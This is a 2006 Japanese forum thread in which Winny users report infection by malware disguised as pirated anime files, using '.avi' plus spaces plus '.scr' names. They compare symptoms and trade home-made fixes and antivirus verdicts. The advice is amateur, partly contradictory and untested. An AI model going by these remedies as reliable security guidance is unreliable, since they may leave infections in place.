リスト内のどれだか分からない・・・ああ無能・・・
オンラインスキャンは、nyのupフォルダとOSとかが入っているパーティションが
同じのため、常に満杯で、スキャンできない(スキャンするために事前にこちらに
ダウンロードするファイルがダウンロードできないせいかな?)
プロセスタブにいろいろでてるけど、この中のどれかが分かれば
止められる気がするんだけど・・・
277:名無しさん
06/11/25 14:06:23 VGkfKkFW
>>276
もうスタートアップに組み込まれてるかもしれんが、一度再起動してみれば?
最悪はもう起動しないかもしれないけど。
278:名無しさん
06/11/25 14:08:04 VGkfKkFW
あと問題が解決するまでは、オンラインスキャンをやる以外、極力ネットに繋げないことをお勧めする。
279:名無しさん
06/11/25 14:11:04 ApPIpq5T
URLリンク(uechoco.s14.xrea.com)
URLリンク(blog.livedoor.jp)
URLリンク(www.ccleaner.com)
解説ページ(一例)
URLリンク(eazyfox.homelinux.org)
この辺やっとけ
280:273
06/11/25 14:25:52 mOhAupiS
>>277-279 レスサンクス!
再起動しても変化無しです・・・
ny自体削除しましたし、通信状況からすると、勝手にどこかに
ファイルを転送している様子もありません。
upフォルダ内のタイトルを見ると、メディアファイルだけなので、
特に送られたとしても問題ありませんが・・・
reg cleanerとeasy cleanerの二つを積んでますが、
削除の狙いがつけられないので・・・
ウイルスは隔離されているけれど、
その影響は続くってこと、あるのかな?
281:名無しさん
06/11/25 14:36:44 VGkfKkFW
>>280
別のドライブにファイルを移動して、空き領域を増やしてからオンラインスキャンをやってみるしかないね。
まだコピーする処理が動いているなら、そのプロセスを見つけてタスクマネージャーから動作を終了させるしかないよ。
282:273
06/11/25 14:59:05 mOhAupiS
>>281
空きがでると、すぐにまた一杯になる。多分、ディスクの空き容量が
メディアファイルの全体量より大きければ、全てをupさせて止まるんだろうね。
プロセスを見つけようとしたけど、特定できなかった・・・
メディアファイルだけを狙ってupしてるけど、有名なウイルスではないのかな?
メディアファイルの最後にexeをつけてavi.exe mp3.exe wmv.exe とかにする・・・
283:名無しさん
06/11/25 15:12:24 VGkfKkFW
>>282
スタートアップフォルダに覚えの無いプログラムが登録されてないかい?
あとはWindows最適化ツールとかを入れているなら、自動実行されてるプログラムをチェックできるけどね。
それでも判明しないならもうお手上げだ。
284:273
06/11/25 15:47:52 mOhAupiS
>>283
何度も親切にレスしてくれて有難う・・・(涙)
もう少しプログラムに詳しければいいんだろうけど、ごめんなさい・・・
プログラム名特定で、「これを削除しろ!」とか言われないとダメかも・・・
他にも被害者がいる筈と思って、調べているんだけど、
なかなか狙い打つプログラム名に行き当たらない・・・
250GBのハードディスクを2つのパーティションに分けて、
20GBをプログラムに、230GBを保存に使ってたんだけど、
両方残り1GBのところで、切羽詰って古いのを消して使ってました。
230GBの方にあるメディアファイルが20GBのパーティションの方に流れ込むので、
厳しい状況です・・・20GBの方にも、バックアップを取ってないのがかなりあって・・・
以前なら迷わずクリーンインストールしたのですが・・・
泣き言連発レスで鬱陶しくしてすみません
285:名無しさん
06/11/25 16:10:33 Zi0nvd3f
>>267
同じ様な状態、フォルダを削除したところ何もおこらなくなった
286:名無しさん
06/11/25 16:35:16 VGkfKkFW
>>284
よく聞く情報漏えいをもたらすAntinnyというウイルスは、svchost.exeというシステムファイルに偽装して活動するらしい。
もう一度タスクマネージャのプロセスタブを開き、イメージ名でソート後、svchost.exeを探してみてくれ。
いくつかあると思うが、ユーザー名がSYSTEM、NETWORK SERVICE、LOCAL SERVICEなら問題ないが、
ユーザー名が自分のユーザー名になってるsvchost.exeがないかい?
もしあったらそれがウイルスだ。終了させてみてくれ。
なかったら他のウイルスだろう。ウイルススキャンして見つけるしかない。
287:273
06/11/25 17:02:51 mOhAupiS
>>286
本当に感謝しています!私もかくありたいと思うばかりです!
タスクマネージャーで、2つありました。
ユーザー名の調べ方が分からず、ファイル名で検索したら、
1つしか見つからず、所有者はAdministrator(自分のユーザー名)で、
その周辺にあるファイルも全て所有者は同じでした。
OSは2000です。ユーザー名の調べ方が間違っているのかもしれません。
タスクマネージャーで、試しにタスクを終了させて見ましたが、
2つ共、終了できませんでした(エラー表示が出て)。
バスターが検出しないほどよくできているってことなんでしょうか?
親切にご指導頂いているにもかかわらず、スッキリ解決できなくて
恐縮しています・・・でも、本当に嬉しいです。
288:名無しさん
06/11/25 17:07:42 ApPIpq5T
だから>>279の上段2つ使えと・・
289:273
06/11/25 17:23:54 mOhAupiS
>>288
SlightTaskManage
山田チェッカーというやつですか?
SlightTaskManageはよさそうですね。
ただ、ハードディスクが一杯でダウンロードしようとすると
始らない状況になっているんです・・・
他のPCでダウンロードして、メディアを使って、プログラム以外が入っている
パーティションへ入れるということなら可能だと思いますが・・・
山田チェッカーの方は使用法がいまいちよく分からないので、
もう少し見てみます。
レス有難うございました。連投して本当にごめんなさい
290:名無しさん
06/11/25 17:40:29 ApPIpq5T
フロッピーみたいな時代遅れのメディアから起動してみたらどうだろうか
山田チェックツールはHOSTS修正やsvchost.exeのプロセススキャンに使える
291:273
06/11/25 17:49:28 mOhAupiS
>>290
有難うございます!
近頃使わなくなったフロッピーですが、今回は役立ちそうですね!
コンビニで買ってきます!
山田チェックツールでプロセススキャンできるんですね!
ガンを見つけたいです!!!
2chで質問すると、結構叩かれることが多いですが、
今回は本当にいい方達に恵まれました!
悲惨な状況ですが、光が差してきました!
292:名無しさん
06/11/25 19:42:22 oXbkAWJo
武装錬金第8話寄宿舎の夜の.scrにて引っ掛かった
真赤な誓いにノリつつ開いたのが不味かった
症状はウィルスファイルの入ったフォルダのファイルがbmpに変えられたほか
C:にHARADAOTAKUという名前のフォルダが作られたが中身何も無し、デスクトップ画像も見当たらず
ProgramFilesフォルダを見てみたものの特に変化は見られず。
外付けHDDに入れてたから影響少なかったんかな?
まあ外付けに十把一絡げでコピーしたから気付かなかったわけだがorz
293:名無しさん
06/11/25 19:59:26 VGkfKkFW
なんか症状も様々あるようだね。
ウイルスバスターのオンラインスキャンはまだ反応しない。対応遅すぎ。
294:名無しさん
06/11/25 23:59:40 YheDfEi0
>>292
たぶん同じファイルにやられた。
HARADAOTAKUまでは一緒だが、ProgramFileはexeとかかなり消された。
スキャンしたが特に怪しいファイルとかも見つからなかったのでとりあえずそのまま使ってる。
そのうち暇を見てクリーンインストールする予定。
295:名無しさん
06/11/26 00:37:52 Nd1ir8mx
デスノートのscrで引っかかった・・・orz
朝見てDL完了してたから、「確認確認~」って安易にクリックしてもた・・・。
ウィルスバスター2007では駄目だったね。
C直下に「KANONMATRIX」なるフォルダができてたが、
ウィルスが活動初めてソッコーでタスクを落としたからか、
フォルダの中身は空だった。
とりあえずカスペをインスコして完全スキャン中。
Program Filesの中も、中途半端に消えてるのと消えてないのがある模様。
ちなみに画像は月宮あゆで、「Winnyやめないとファイルを全部けしてあげるよ」的なメッセージが書いてあった希ガス。
296:名無しさん
06/11/26 00:45:04 he/6jaar
俺は>>252と同じHIZACってヤツに引っかかった事がある。
「しまった」と思った瞬間にPC強制終了させたので
同じフォルダ配下のファイルを半分くらいbmp化されただけで済んだ。
最後までほって置いたらどうなってたかは知らないけど。
297:名無しさん
06/11/26 11:23:36 +QKS8c6n
>>296
うちも同様の症状にかかった。ブラックラグーン2で。自分が体調不良のときのミスクリックで発症。
カスペルスキーを4980円で昨日買って別なHDDにインストールしなおしてから、感染したHDDを外付けにしてチェックかけたら
一瞬でそのワームを削除してくれた。
しかし、配下のフォルダ、プログラムファイルズが うぐぅ の.bmpにされてしまった。
別パーティションのドライブは無傷。メーラー入れてる人は他に感染させるおそれ大だから要注意。
うちのは遊びPCでメーラーとかいれてないから助かったが。市販ならカスペ、フリーならAVGでしょうな、こりゃ。
298:名無しさん
06/11/26 11:51:22 O0crYrMW
ワームに感染するのか。
C直下のファイルと実行したSCRファイルを削除しただけで
何も対応してなかったけどAVGインストールしてチェックしてみるか。
299:名無しさん
06/11/26 14:10:35 QnMeKnx3
映画トゥモローワールドでやられますた
他のPCのデスクトップに移動して開いたので
そのデスクトップ上の画像と動画が軒並みBMPに書き換えられたけど
すぐにプロセス止めたので浅い階層のみで済んだのが救いかな。
295と同じで、C直下に"KANONMATRIX"ってフォルダ作られてた
中には"NEO"ってファイル名の自分のデスクトップ画像が1枚・・・
とりあえずフォルダ削除&Prefetchフォルダ内の関連ファイルを削除
再起動してもフォルダは復活してないんで
とりあえずは大丈夫なのかな・・・
300:再インスコ?
06/11/26 17:06:30 EfN+vzkB
映画「フラガール」でやられますた
「まだまだ仁義なき朝比奈みるく」とかです
マイドキュメント内のファイルが軒並みタイヤキの画像ファイルに・・・
AVGでファイヤーウォールの警告が出ました。
すぐに強制終了させましたが、かなりのファイルがとびました。
Winnyの本体プログラムも消されている様子
単純なファイル名偽装トリックだったのに・・・・くやピー!
****.avi + 長ーいスペース + .scr というファイル名
再起動後は正常そうだが・・・ちょっと心配
301:273
06/11/26 17:14:16 rxZdwJIy
BKDR_AGENT.CUN
これに感染してみたいです。
隠しファイルで YA_WMP.EXE というのがあり、
それが作ったファイルはバスターが反応して隔離してました。
mp3ファイルの形をし、開く前のウイルスチェックを潜り抜け、
音楽再生中に発症するなんて・・・恐ろしい・・・
レス頂いた皆様、本当に有難うございました!
後遺症は依然続いており、mp3.exeやavi.exe、wmv.exeとかいう拡張子になった
ファイルが隠しupフォルダ内にあって削除できない状態が続いています。
全てが使用中となっていて削除しようとするとエラーになったしまうんです。
302:名無しさん
06/11/26 17:24:52 7Bf9Mg2M
なんでこんな過疎板にこんなマイナーなウィルスに感染する人がバカバカ現れるんだろうか?
303:阿藤怪 ◆AK4448090.
06/11/26 17:26:43 kX5b9hXY
/ミ ̄' ヽ、
| ノ 二 <(●
| /(● 、>、| この人たちってどっから来るんだろう。
| @ノ -=ヲ ノ
\ヽ__ ,ノ
304:名無しさん
06/11/26 17:33:00 7Bf9Mg2M
感染するとロビーに書き込むウィルスなのかもね
305:まりぃ@ブラッディ ◆JcP82GanDE
06/11/26 17:33:50 NiPuBvm3
逆に、ここにいる人が感染しやすいということは
306:298
06/11/26 17:37:05 zl0znlX+
AVGでチェックしたけど何も問題なかった。
ただlive2chでウイルスコード貼ったレスを読み込んだ時の
datファイルがILoveYouとして引っかかった。
これくらい検出してくれよマカピー・・・。
307:名無しさん
06/11/26 17:42:18 7Bf9Mg2M
我々のレスに全く反応しないあたりホントにウィルスかスクリプトかも
308:みのりかわ糊
06/11/26 17:51:53 LeWhZii6
ノートンってインターネットセキュリティは2005のままで
アンチウイルスだけ2007にするってできるのかな。
309:阿藤怪 ◆AK4448090.
06/11/26 18:05:57 kX5b9hXY
/ミ ̄' ヽ、
| ノ 二 <(●
| /(● 、>、| しかし、ノートン先生はケントデリカットそっくりだな。
| @ノ -=ヲ ノ
\ヽ__ ,ノ
URLリンク(www.kensuke.net)
310:名無しさん
06/11/26 18:07:14 7Bf9Mg2M
ユタはイナカジャナイヨー
311:名無しさん
06/11/26 18:24:46 pv216jQQ
>>301
特定しててこれはやったんかおまい
URLリンク(www.trendmicro.co.jp)
312:名無しさん
06/11/26 20:06:14 8OLtS4g/
自分は>154でやられたもんだけど
ウィルスを開いてしまったら手間隙惜しまず
PCリカバリするのがいい
後々の被害を省みないというならその場しのぎの処置をしてればいいけど
このウィルスは気持ちが緩んだ時にうっかり踏むんだよな
油断禁物思い知ったよ
313:名無しさん
06/11/29 19:05:55 TdB0KQ+A
俺もやられた。
downフォルダがやられたが別にこれはどうでもいいんだが、
program filesフォルダのexeファイルがいくつかやられた感じだな。
exeファイルがフォルダに入って深い階層にあるやつは無事だったが
そうでないのがいくつかやられたか・・・
314:313
06/11/29 20:20:35 TdB0KQ+A
システムの復元してみたが、壊されたプログラムは復元しても
やっぱりどこかおかしくなってる物が多いな。
大人しくクリーンインストかけた方がいいんだろうか?
315:名無しさん
06/11/29 21:00:58 9Kp+MDsJ
「やられる」って具体的にどうなるの?EXEが消される?
俺の場合特に異常は見られないんだが・・・
316:名無しさん
06/11/29 21:08:26 dkBHLT4t
>>314
システム復元はやらないほうがいいよ。
このウイルスはシステム復元用のファイルにコピーを保存するらしいから。
俺はOSの再インストールせずに使ってる。
そのまま使う場合は、いくつかのセキュリティーソフトのオンラインスキャンで全体チェックしたほうがいいよ。
システム復元用のファイルも全部消した。
あと消されたアプリはexeだけの復旧ではなく、再インストールしたほうがいいよ。
317:名無しさん
06/11/29 23:19:32 TdB0KQ+A
>>316
復元やってしまったから取り敢えずノートン先生の体験版落として
スキャンかけてるがlive2chのログのウィルスコードくらいで
特になんか検出はされないよ。
取り敢えず問題のファイルが復活する事もないし何も出てこなければ
それで大丈夫なんだろうか。
まあ、そのうちクリーンインストールかけようと思ってた所だから
クリーンはかけるけど。
ウィルスバスター持ってたから一応開く前にスキャンかけたのに
何も検出しないし使えないなぁ。
318:名無しさん
06/11/29 23:36:09 dkBHLT4t
>>317
俺もバスターが反応しなかったので、そのまま実行してしまった。
もうバスターは使えないと思ったね。
他のセキュリティーソフトに変更する予定。
319:313
06/11/29 23:38:05 TdB0KQ+A
>>315
後、俺の場合新種なのかわからんけど、exeだけじゃなくフォルダの
中のファイルは全部やられたよ。
話を見てるとProgram filesに置いてあるフォルダの
exeファイルだけやられてってあったけど、exeだけじゃなくて
フォルダの中身が全部消えてた。
ちなみに>>296や>>252と同じHIZACってのがCに作られてたけど
見たときはファイルは何も無かった。
取り敢えずこのフォルダは消しといたけど。
320:名無しさん
06/11/30 03:54:27 jzsL2pZc
exeは消されるだけじゃなく、消されたdownフォルダ内のファイル名で
上書きされてるのもあった。
Application Data内のファイルにも影響があるぽい。
あとパーテーションで区切ってたり、物理的に別ドライブであっても
nyフォルダ下のdownフォルダは狙い撃ちされるみたい。
亜種がいろいろあるみたいで一概に言えんかもしれんが、
プロセス止めるまでのタイミングで被害に差はありそう。
321:名無しさん
06/11/30 12:36:16 cwwlc0wI
プログラムファイルとかアプリにまで食らったら
おとなしく再インストした方が良さそうかも。
中途半端に壊されるから上書きしても少しおかしかったりするし、
後々のことも考えると。
俺もバスターだったが使えないな、こいつ。
ファイアウォールもアップを防いだのかよくわからないし。
322:名無しさん
06/11/30 19:27:40 cwwlc0wI
やばいのは問題のファイルとCドライブに作られるフォルダと
復元のコピーのみ?
こいつを何とかしておけばレジストリとかどっかに感染は
ないみたいだから取り敢えずは使ってても
問題無いのかな。
なんか亜種が山程あったりウィルス対策ソフトで
スキャンしても引っ掛からなかったりよくわからん。
323:肉茎平均
06/11/30 19:41:48 ShZ4Y7bP
winnyって怖いね
やらないほうがいいね
324:名無しさん
06/11/30 20:16:16 dx1I9YBJ
この人達はどこから来るの?
325:肉茎平均
06/11/30 20:22:51 ShZ4Y7bP
ロビーの人じゃないことは確かだね。
てか、多くて2人くらいで書いてるんじゃないの?
326:名無しさん
06/11/30 20:27:08 dx1I9YBJ
二人だけで300レス以上回してんの?
なんの目的があって?
327:名無しさん
06/11/30 20:28:19 Do+1xoB0
え?別に迷惑かかってないんだからいいじゃん。
328:肉茎平均
06/11/30 20:29:47 ShZ4Y7bP
いや、目的はわからないけどそんなに多くのロビラーがいきなり急にwinnyのウィルスに
こんなに関心持つとは思いづらいし
329:名無しさん
06/11/30 20:36:07 yLY3Cisk
ウイルス情報求めて
スレッド検索から来てるんじゃないのかな
330:名無しさん
06/11/30 20:44:07 LCjTFIhq
こっちに誘導された
331:名無しさん
06/12/01 03:04:15 Zkp83+Dp
>>329
正解
332:名無しさん
06/12/01 03:45:13 CtfcRtpb
初めて見たときは「何このアイコンwwスクリーンセイバーって書いてるだろww」
と思ってさっさと消したのに今日は何故か疑いもせず踏んでしまった('A`)
何やってんだ俺
また落とし直しか…
333:名無しさん
06/12/01 10:31:12 O07eX/Zl
たこさんウィンナーでやられた・・・。
なんか怪しいな、っていうのは思ったんだけど
デスノ見たさに思わずクリック。
ちなみに私は、『ウィルス たこさんウィンナー』でググって
こちらに辿り着きましたよ
334:名無しさん
06/12/01 13:43:11 PJPPvnx5
「コードギアス8話」で感染してしまった…。
再起動とか終了して立ち上げると履歴やらデスクトップが一掃されるんだが。
ちなみにexeもいくつか消された。
それ以外は結構マトモに動くんだが、スキャンしても引っかからないし…。
やっぱOS再インストするしかないのかなぁ…。
335:名無しさん
06/12/01 14:31:22 c0Ql3ACR
べつに、プロセスで何もウイルスらしきものが動いてなくて
レジストリも正常で何の問題もなくOSも全てのアプリも使えているなら
再インストとかクリーンインストとか必要ないやん。
やったほうがスッキリするだろうけど、面倒やん。
336:334
06/12/01 15:52:35 PJPPvnx5
まぁ、確かにそうなんだが、お気に入りとか毎回消されるのは困る。
デスクトップに置いたファイルは毎回ゴミ箱以外消されるし。
アプリは再ダウンロードすれば問題ないんだけど。
再インスト以外の解決法知ってる人いたら教えてくれると有難いな。
337:名無しさん
06/12/01 16:28:47 AjIAwmw5
>気に入りとか毎回消されるのは困る。
>デスクトップに置いたファイルは毎回ゴミ箱以外消されるし
あんたそれ、正常な状態じゃないっすよ。。
再起動してもそうなるんだったら明らかにレジストリが
書き換えられているし、ウイルスも毎回起動しているはず。。
338:名無しさん
06/12/01 16:58:00 Lk4HNxkS
>>336
スタート→「ファイル名を指定して実行」から「msconfig」と入力して実行する。
システム構成ユーティリティが起動するから、スタートアップタブを開く。
その中に覚えのないプログラムが登録されてないかい?
339:名無しさん
06/12/01 17:03:26 N3eckqRo
アンチウィルスソフト各メーカーに告ぐ
「 W i n n y を 封 鎖 せ よ !」
「 う ぐ ぅ ウ ィ ル ス は ス ル ー し ろ っ !」
340:名無しさん
06/12/01 18:38:32 JxCvDGr6
テキストのアイコンをした「ファイルの再生方法」とかかれたscrファイルを不用意にもダブルクリックしてしまいました。
すると突然PCが終了されてしまいました。
その後、winnyのアップフォルダのチェックもし、PC全体にウイルスチェックをしても何も見つからないのがかえって不気味です。
一応システムの復元もしましたが、今後どのように対処したらいいのでしょうか?
341:名無しさん
06/12/01 18:44:39 /CsbOlQ8
実際そんな風潮だなぁ。
発見から結構経つのに全く対策取ってないとこ多いし。
nyでやられたのなら自分にも非があるが、普通にどっかでアップされてるのを
落とした人は哀れだ。
知らないなら引っ掛かりやすいし、スキャンしても何も出てこないんだし。
342:名無しさん
06/12/01 19:50:02 lmb5Q3w6
スキャンしても何も出ないからどこまで安全かわからんのが怖いな。
再起動して問題の物を削除すれば大丈夫かと思いきや>>334みたいな例もあるし。
大人しく再インストしとくか・・・
343:名無しさん
06/12/01 20:28:09 +dMtUPGV
君ら、アンチウィルスは入れてないのか
344:コウモリ駅長 ◆LpppppNqDQ
06/12/01 20:44:30 8vlgiPhs
winnyなんか使うか?
345:名無しさん
06/12/01 21:21:43 CtfcRtpb
アンチウイルスソフトとか関係無いからな、コレはw
ファイルの種類が「スクリーンセーバー」って書いてるのに先走って踏んでしまった
落とした側の責任だ。
数百GBトンだがいい薬になった。これからはもっと気をつけないとな
346:名無しさん
06/12/01 21:39:36 4qcMP7oP
最近になって急にウイルス被害者が増えたな。
ウイルス自体は単純なものでしかないんだけど
少し前のやり方よりも踏ませ方が上手くなったと思う。
347:334
06/12/01 22:14:34 PJPPvnx5
>>337
やっぱりおかしいよな…。
再起動してパスワード入力してからデスクトップになるまで凄い時間が掛かってたのは書き換えられてたからなのか…。
>>338
パソ初心者だから正直よく分からなくて申し訳ない…。
覚えのないプログラムというか、どれが必要なプログラムかすら分からない・・。
何かWINDWSファイルのなかのPrefetchというファイルを見つけたんだが、中身が全部「不明なアプリケーション」なんだが、これは何なんだ…。
それにしても、ここのスレの住人は皆優しいな。
348:名無しさん
06/12/01 22:57:35 LRSLsdp7
プログラムファイルのデータを飛ばされたせいかわからんが
踏んでからどう見ても色々と不安定だから結局再インストする事にした。
今までは動画はそんなに危険じゃないと思ってたからいい薬になったよ・・・
349:名無しさん
06/12/01 23:04:50 LRSLsdp7
>>347
ノートンの体験版かオンラインスキャンでもしてみたらどうだ?
既に持ってたら悪いがノートンなら少しは反応するからなんか出るかも。
350:名無しさん
06/12/01 23:23:56 Xxd/eTSC
>>347
URLリンク(www.tef-room.net)
パーティションで分けてるなら
必要なデータだけを別ドライブに移して
再インストールした方が早いよ。
351:肉茎平均
06/12/02 00:15:01 mmkdPIPG
プロバイダからメール来た人いないの?
352:名無しさん
06/12/02 04:01:30 UtcPtCT1
自分もあっさり感染してしまったので、C下に作られたフォルダと元ファイルはきっちり削除したんだのですが
システムの復元ファイルにだけアクセスできずじまいでした。
ちゃんと復元ポイントのファイルはすべて無効にして削除したのですが…。
アクセスできないものは仕方ないのでシステムの復元にだけ気をつけて今度生活していけば良いですよね?
353:名無しさん
06/12/02 07:06:45 7YZq/eDQ
>>352
URLリンク(support.microsoft.com)
俺は復元を無効にしても消えなかったので、手動で消した。
あと、セキュリティーソフトによっては、このウイルスを検出できないので、
検出できるセキュリティーソフトを入れておいたほうが良い。>>262
すぐ導入できなければ、セキュリティーソフトメーカーのオンラインスキャンで、
一度全てのファイルをウイルスチェックをしたほうが良い。
ノートン
URLリンク(www.symantec.com)
カスペ
URLリンク(www.kaspersky.co.jp)
F-Secure
URLリンク(www.f-secure.co.jp)
354:名無しさん
06/12/02 07:30:21 F4YyL+wq
途中でプロセス終了せずに
最後まで実行しきった人っているの?
自分は気づいてすぐにPCを再起動したので
同一フォルダファイルのbmp化とC直下にデスクトップ画像作成だけで済んだようだが
最後まで実行するとどうなるのか気になる。
355:名無しさん
06/12/02 07:46:38 7YZq/eDQ
俺も途中でタスクマネージャから強制終了させた。
bmp化、SS作成、Program Filesのファイル削除だけ確認できた。
bmp化の途中で止まったようだ。
>>92にあるようなftpでファイル転送という動作は確認できなかった。
356:334
06/12/02 09:08:45 1//v07RD
>>349
ノートンやってみた。
前オンラインスキャンで検出されなかったから(ノートンじゃないが)、体験版でやってみた。
検出されたっぽいから対応するみたいなのやったら直ったっぽいよ。
ありがとう。
>>350
情報ありがとう。
Prefetchファイルはウイルスが入ったりすることもあるっぽいから一応削除してみた。
再起動したときにはまた構築されてたから消しても大丈夫っぽいな。
一応ノートン+Prefetchファイル削除で直ったっぽい。
ちゃんとデスクトップもそのままだったし。
まだ様子見てみないとわからんが…また相談しにくるかもしれん…。
ご迷惑おかけしました。ありがとう。
もうWinnyには懲りたよ。
これからは気をつけないとな…。
357:名無しさん
06/12/02 21:43:39 f7q2MUwc
最近はnyより洒落のが情報流出とかの方の被害は多いらしいけど、まだまだnyも怖いな
358:名無しさん
06/12/02 22:30:57 7oQkwKCX
デスノート9話「接触」.srcにかかったので記念パピコ
ダウンフォルダの中身のみ消されてbmpが残り(ダウンフォルダ下のフォルダ内ファイルは無事)
C直下にうぐうフォルダ作成されてた。
復元ポイントは作られてなかったのでとりあえず安心。(念のためシステムは前日のものに復元
今は上記のファイルを削除して様子見してる。一応プロセスでは変なの動いてないかな。
なんか変化があったらまた報告します
359:名無しさん
06/12/02 23:21:23 z7OtWFYk
相当亜種あるのか。
報告された被害内容や作られるフォルダ名とかどれも微妙に違うし。
360:肉茎平均
06/12/02 23:30:00 mmkdPIPG
誰かPD使ってる人いる?
361:名無しさん
06/12/03 00:52:59 NWrWge1O
PDってなに?
362:肉茎平均
06/12/03 13:27:10 y6x4fw7S
Perfect Dark
363:名無しさん
06/12/03 14:02:38 UzPUgH4l
>>340と同じ手口に引っ掛かりましたよorz
おとなしくOS再インスコが最適な処理でしょうか…。
どなたか助言願いますm(_ _)m
364:名無しさん
06/12/03 14:08:30 NWrWge1O
Perfect Dark って360のゲーム?
365:名無しさん
06/12/03 16:07:33 VC9MD6y/
>>363
心配だったら再インスコ
表面上何もなくて気にならないならそのまま使えばよし
全ては自己責任で判断どうぞ
366:名無しさん
06/12/03 20:56:58 /GdUCLPp
プログラムファイルの影響が軽微ならそのまま使ってもいいけど、
ある程度ダメージがあるんなら再インスコがおすすめだがな
367:名無しさん
06/12/03 23:03:27 5VCFlYHx
デスノ10話目でやられた。
Cドラのプログラムも幾つか消されてるし。
再インストしまーす。
バスター、反応しなかったわ。
368:名無しさん
06/12/03 23:15:00 0tW6NSUN
これから感染報告時には何の画像が表示されたかとかも書いてほすぃ...www
369:名無しさん
06/12/03 23:19:51 kxZGAU8M
今のところ検出できるのは
ノートン、カスペ、AVG、a2
検出できないのは
バスター、マカフィ、avast!、AntiVir
他にも確認できたのがあれば追加よろ。
370:名無しさん
06/12/04 08:28:16 9VCS7/Tz
>>363
自分も引っかかった_| ̄|○
ただ、Cドライブプログラムは全く変化なしだし
upフォルダもいかれてない。
人柱となり様子見ます。
371:368
06/12/04 11:23:05 6r+x3nm9
アニメにそこまで詳しくないので、
アニメの種類はわからないけれど、女の子の絵だった。
文章は覚えてる部分を羅列するけど
『まだ P2Pなんて 0.5秒で切らないと ブっ殺しますよ』
という単語が含まれてたはず。0.5秒ってのは確実。
372:名無しさん
06/12/04 11:23:52 6r+x3nm9
↑
367ね。間違ったw
373:名無しさん
06/12/04 11:40:40 zGya7Xb9
今のとこ報告のある画像で多いのは
カノン(タイヤキ、ウィンナー)ハルヒ(長門)
少なくとも画像の種類だけ亜種があるってことか
374:名無しさん
06/12/04 14:16:14 +XQbmnG+
>>373長門さんって多いのか??
375:名無しさん
06/12/04 21:43:22 Aev1qQ91
>>371
エルルウが「そろそろnyやめないとぶち殺しますよ、、、」って笑顔で言ってるやつがあったからそれの仲間かな?
376:名無しさん
06/12/04 21:48:51 ZQU6ZvdX
>>371の絵の女の子ってもしやネコ耳生えてなかったか?
377:名無しさん
06/12/04 21:58:12 LQh9uhog
抽出してみた
URLリンク(vista.jeez.jp)
URLリンク(vista.jeez.jp)
378:367
06/12/05 15:07:35 3YmbucrG
いや、ネコ耳とかじゃなく普通の人間の女。
髪は薄い青で、画像の質的に少し古そうな
アニメだったけど・・・。
髪型はロングで、服装は学生っぽい。
目が『^^』こんな感じ。
nyという単語は出てなかった。
379:名無しさん
06/12/05 15:50:46 07HPxnCn
>髪型はロングで、服装は学生っぽい。
マジか?これ学生と見なせるという目が信じられんwww
380:nu- IE版 ◆Ujnu.4men.
06/12/05 16:26:36 pt4jr2j+
>>379
なんだったの?
ていうかあれだな
ウイルス作者は今後コピーライト入れといてくれ
著作権的にも☆ね
381:名無しさん
06/12/06 17:31:57 EhVjdpnY
デスノ10話でやられた('A`;;;;;;;;;;)
デスノ用チェックで^^^^^^^^^^^^^^^
382:名無しさん
06/12/07 01:32:54 COT8FnzD
(アニメ) デスノート DEATH NOTE 第10話 「疑惑」 (日本テレビ 704x396 DivX640 QB97%).avi(スペース数十個).SCR
237,086,208 46b8b086668a767ec7c06bc12b30a11b
これかな?
俺も引っ掛かって色々検索してたらこのスレにたどり着いた。
ファイル消去は今のところ確認できないが、CドライブにUGUUフォルダが出来ていて実行したときのSSがbmpファイルで入っていた。
実行時に画面に何かが出たりはしなかった。
バスターで全ファイルを調べたが、ウイルスは検出されなかった。
しばらく様子を見ようと思う。
383:名無しさん
06/12/07 01:37:40 COT8FnzD
>>377はこれだな
URLリンク(www.utaware.net)
384:名無しさん
06/12/07 04:18:42 1iaNiVlH
くそっ
そろそろ寝ようかってときに引っかかっちまった
武装錬金の9話
カノンの栞が出てきた気がする。
エロ動画ばっかりとかなんとかメッセージがあった
385:名無しさん
06/12/07 17:00:03 zZWYkUdV
一応、ウイルスに引っかかった人は、
スタートメニュー→ファイル名を指定して実行→msconfig→スタートアップタブ
で、OSが起動するたびに動いているプログラムをチェックしておくことを
お勧めするよ。
レジストリエディタで見るより分かりやすい。OSによってはmsconfigでは
ない場合もあるかも。
386:名無しさん
06/12/08 23:49:51 5Y2p172B
わかんないけど
オリジナルのアイコンに変えとくとかの対策は意味ないの?
387:名無しさん
06/12/09 05:24:39 2yoqTGHy
>>386
それは有効らしい
388:名無しさん
06/12/09 06:16:59 ZalApD6x
俺、変えてたけど踏んだ。
バスターを信用していた俺がバカだった。
389:334
06/12/10 16:35:31 UvzGbDQ1
昔デスクトップがおかしくなったと書き込んだ334です。
ノートンで解決したと思ったが、そうでもなかったっぽい。
ローカルディスクいじってたらDocuments and Settingsファイルに新たにAdministrator.LATITUDE-D500ファイルが出来ていた。
どうやら新しいユーザーが勝手に作られてたってことなんだろうか。
現在起動すると普通にAdministrator.LATITUDE-D500というユーザーになってしまってるみたいなんだが、誰か解決法あったら教えてやってください。
何度も何度も申し訳ない…。
390:名無しさん
06/12/10 17:12:47 m0nZ8WFm
>>389
さっさと再インストしておけば
今頃は普通にPC使えてたのに
391:名無しさん
06/12/10 18:37:44 yFTgyHXH
>>389
勝手に作られて無いとオモ
392:334
06/12/10 21:11:30 UvzGbDQ1
>>390
いや、パソコンを普通に使う分には問題ないんだが、ちょっと気になったんで。
やっぱ再インストするしかないか…?
>>391
ちょっと意味がわからないので詳しく教えてくれませんか…?
393:名無しさん
06/12/10 21:14:36 Ksd5K8A6
>>340
私も同じくテキストのアイコンをした「ファイルの再生方法」とかかれたscrファイルをダブルクリックしてしまいました。
するとメディアプレイヤーが立ち上がり突然PCが再起動されてしまいました。
再起動後、またすぐにメディアプレイヤーが立ち上がり再起動・・。
ウイルスバスターも反応せず。
一体どうすればいいのでしょうか。
394:名無しさん
06/12/10 21:46:04 yFTgyHXH
>>392
DELL社製のLatitude D500使ってね?
DELLの人がXPインスコした時に作成したものだとオモ
395:名無しさん
06/12/11 00:29:24 XDn90K8P
ウイルス感染後にMSNメッセを起動したら、修復中とかいうメッセージが出た。
そのときは、あまり気にしていなかったが、数時間PCを放置したあと戻ったらメッセのアイコンが
別のものに勝手に変更されていた。やばいと思ったから再インストールした。
396:名無しさん
06/12/11 01:50:24 TB2ZHclH
>>393
俺も同じ症状です。
メディアプレイヤーは閉じるを押したら消えるので強制終了は回避できるが…
毎回起動するのは変わりませんな。
そのウィルスクリックしたときコマンドプロンプト起動しなかった?
397:名無しさん
06/12/11 07:04:02 vjp4PEgu
>>393>>396
1
